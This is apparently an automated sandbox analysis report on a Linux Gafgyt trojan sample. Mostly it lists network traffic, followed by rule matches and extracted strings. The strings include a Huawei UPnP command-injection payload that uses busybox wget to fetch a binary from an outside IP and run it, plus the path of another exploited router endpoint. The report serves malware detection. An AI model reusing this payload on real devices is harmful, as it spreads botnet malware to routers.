            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41928

            System Summary

            barindex
            Source: huhu.arm.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5487.1.00007f22fc017000.00007f22fc037000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: huhu.arm.elf PID: 5487, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 45.142.182.123 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnano,S
            Source: ELF static info symbol of initial sample.symtab present: no
